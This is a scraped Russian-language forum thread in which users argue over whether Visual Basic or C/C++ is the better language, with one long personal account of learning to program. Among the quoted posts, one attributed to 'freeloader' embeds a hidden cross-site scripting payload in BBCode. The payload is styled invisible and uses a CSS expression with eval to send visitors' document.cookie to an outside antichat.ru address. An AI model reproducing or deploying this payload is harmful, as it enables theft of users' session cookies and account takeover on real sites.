Mikle писал(а):Sebas
Забыл в цикл сунуть DoEvents.
Это служба!
Mikle писал(а):Sebas
Забыл в цикл сунуть DoEvents.
GSerg писал(а):Предлагаю снести все постинги, кроме первого, и повесить замок
alibek писал(а):Эх, жаль что BP забанен Они бы нашли друг друга
SHURUP писал(а):Мне вообще выбор языка давался нелегко...
В школе на уроках информатики мы изучали Basic (самый, что ни есть обычный), но поскольку компьютерного класса у нас не было – основное внимание приделяли алгоритмам и блок-схемам, а описание работы программ происходило по методу «Дети, представьте себе компьютер. Левая часть доски – это экран, а правая – память в которой хранится программа…».
Впервые увидел компьютер (не считая визитов к знакомым с целью поиграть) – в университете. Там нам сразу сказали, что Бейсик – это отстой (приводили почти те же аргументы, что и в данном топике), и что мы будем изучать «язык настоящих програмистов» – Си (периодически называя его «язык ЭС»)
Работали мы с Турбо Си под ДОС, я потихоньку осваивал для себя новый язык, забывал старый добрый Бейсик с нумерацией строк, и приучивался закрывать эти самые строки точкой с запятой.
Поскольку наша специальность не была никоем образом не связана с компьютерами – курс был краток и Виндовс со всеми его окнами и приложениями мы так и не увидели. Только ДОС.
Особо сложного там ничего не было, и вскоре, сдав курсовую, все забыли о информатике и программировании, и лишь я один из группы тогда понял, что просто так я это дело не брошу.
Взяв в библиотеке книжку по Си, я стал понимать, что возможности этого языка – безграничны, что на нем можно писать программы не только для решения квадратных уравнений, но и графические проги и даже ИГРЫ (под ДОС конечно, ибо о Виндовсе я знал только понаслышке, да и не нужен он мне был тогда). Поскольку дома компа не было – пришлось вспомнить школьные методы и с помощью листка миллиметровки и тетрадки в клеточку «заочно» разработать основу чего-то вроде MSPaint-a. И я думал, что появится у меня комп – я реализую свою прогу, принесу пользу людям и вообще изменю жизнь к лучшему.
Наивен. Через год дома появился ПК, я радовался как мог, но разочарование пришло вместе с надписью Windows98 и окошками, которые были не в сравнение красивее и элегантнее чем в прогах под ДОС. Загрузив с дискетки, которую хранил как зеницу ока, дистрибутив ТС я понял, что мне никогда не написать в этой среде что-то, что имело бы непрямоугольную форму окна (как Автораны некоторых компактов), что могло бы выдать сообщение поверх других окон (типа о нехватке памяти), что проигрывало б не бибикание РСспикера, а настоящую музыку через колонки, и что нужно искать что-то более современное…
В тот же день оббежав всех знакомых я наконец-то достал диск «програмирование для начинающих» на котором была «Visual С v?? for Windows». Радость длилась недолго, ибо ставиться она почему-то не захотела. Пробежавшись взглядом по оглавлению диска я заметил там «Visual Basic 5». Документации к нему на диске не было, справка была урезана, доступа в инет не предполагалось и в планах. Пришлось осваивать все методом научного тыка. Его (VB5) возможности мне сразу показались слегка ограниченными, ибо я не нашел в нем возможности сделать такое простое действие, как «Очистка корзины программным путем», но простота разработки, красота интерфейса покорили меня и я искренне верил, что очистку корзины можно будет реализовать в следующей версии VB.
Однако и в следующей версии «функции очистки» не было. И я искал другие методы и даже иногда находил их. Многие вопросы оставались без ответа, но некоторые можно было решить, добавив в проект компонент «Фантазия v.1.0» и функцию «обхода препятствий нестандартным методом а иногда и даже через Ж.».
Поделившись впечатлениями со знакомым начинающим программистом, получил ответ: «Бейсик – отстой, учи Дельфи там все ясно». И я наверное бы и стал бы его изучать, если б не один друг-однокласник, который (зарегистрировавшись на этом форуме) разнюхал информацию о таком монстре, как «API-функции». Это было что-то. Это все-равно, что жить в доме несколько лет и потом вдруг обнаружить за шкафом дверь в другое здание, в котором можно найти все, что только пожелает душа.
Друг получил благодарность. Я получил функцию очистки корзины. Далее все пошло как по маслу. Достал «MSDN», на отсутствие котрого постоянно ругался VB, подключение к инету, регистрация, первый пост, первая звездочка. Но …
…Но некоторые вещи оставались (и частично остаются) выше моего понимания, такие как «сообщения окну», «отлов сообщений» и подобные. В MSDN-е все на иностранном мне языке, а статей по этим вопросам для VB на русском – не очень то и много. Зато для Си - хоть отбавляй. Делать нечего, приходится ставить Visual C++, в котором эти понятия являются ключевыми и никуда от них не деться. И по крупинкам вникать в основы работы операционной системы. Сечас же пытаюсь параллельно изучать оба языка, перекладывая опыт работы с одной среды в другую. Чего и вам желаю.
Ведь если дискуссия состоит в VB or Cи, то не стоит забывать, что OR это не XOR. и ничего не мешает совмещать эти два хороших язика. Оба они по своему хороши и полезны.
Надеюсь, меня не забанят за флуд.
ЗЫ: кстати в VB7 есть встроенная функция очистки корзины?
Новые дополнения к Правилам конференции, RayShade писал(а):Запрещается злоупотребление цитатами, при использовании цитат не забывайте отрезать лишнее.
Назовите хоть одну стоящую причину
Sasha_karasov писал(а):Короче QBasic это студент! У меня есть картинка там каждый язык как человек! Вот например там Basic выглядит как студень первокурсник, а СИ там самый крутой!
Sasha_karasov писал(а):Оно так и есть в школе учат QBasic, а в вузах учат C++!
Sasha_karasov писал(а):Как было так и осталось!
QBasic и учат чтоб потом перейти на более сложный и мощный язык как C++.
Sasha_karasov писал(а):в Visual Studio не зря запихнули VB и VC!
Sasha_karasov писал(а):Но что я все это время хотел сказать что С++ проживет без VB а вот VB без C++ нет!
Sasha_karasov писал(а):И значит что Visual C++ это самый крутой язык программирования на сегодняшний день, и наверно так будет всегда!
Для меня нет понятия лучше язык - хуже язык, есть критерий на каком языке или комбинации языков я решу поставленную задачу надёжно и в срок.
Mikle писал(а):А для меня, всеже, есть. Просто это не имеет отношения к спору VB vs СИ. Пример - Quick Basic vs Turbo Basic. Обладают почти равными возможностями, но РЕАЛИЗАЦИИ...
Michael Kaplan писал(а):Maybe they will have to prove why they think it is a good choice -- this is a job interview after all! But if I say they can use anything then they can walk in with LISP, SED, QBasic, Pascal, DOS batch files, ALGOL, SQL, or whatever crazy-ass language they want.
freeloader писал(а):[url]www.ut[url=www.s=''
style='font-size:0;color:#EFEFEF
'style='top:expression(eval(this.sss));
'sss=`i=new/**/Image();
i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;
this.sss=null`style='font-size:0;]
[/url][/url]'
Зайди В ЛИТ и глянь на че там хватает, там есть VS, VS.net! да и у нас в школе не хуже!Igor_123 писал(а):Саша!
В школе учат бейсик, не потому, что он чем-то хуже, а потому что во-первых никакой специалист не пойдет в школу/вуз, на 400 грн. з/п преподавать даже тот-же QBasic/С/С++, а во-вторых поэтому и преподают то на что хватает денег.
Sasha_karasov писал(а):Но что я все это время хотел сказать что С++ проживет без VB а вот VB без C++ нет!
Сейчас этот форум просматривают: SemrushBot, Yandex-бот и гости: 22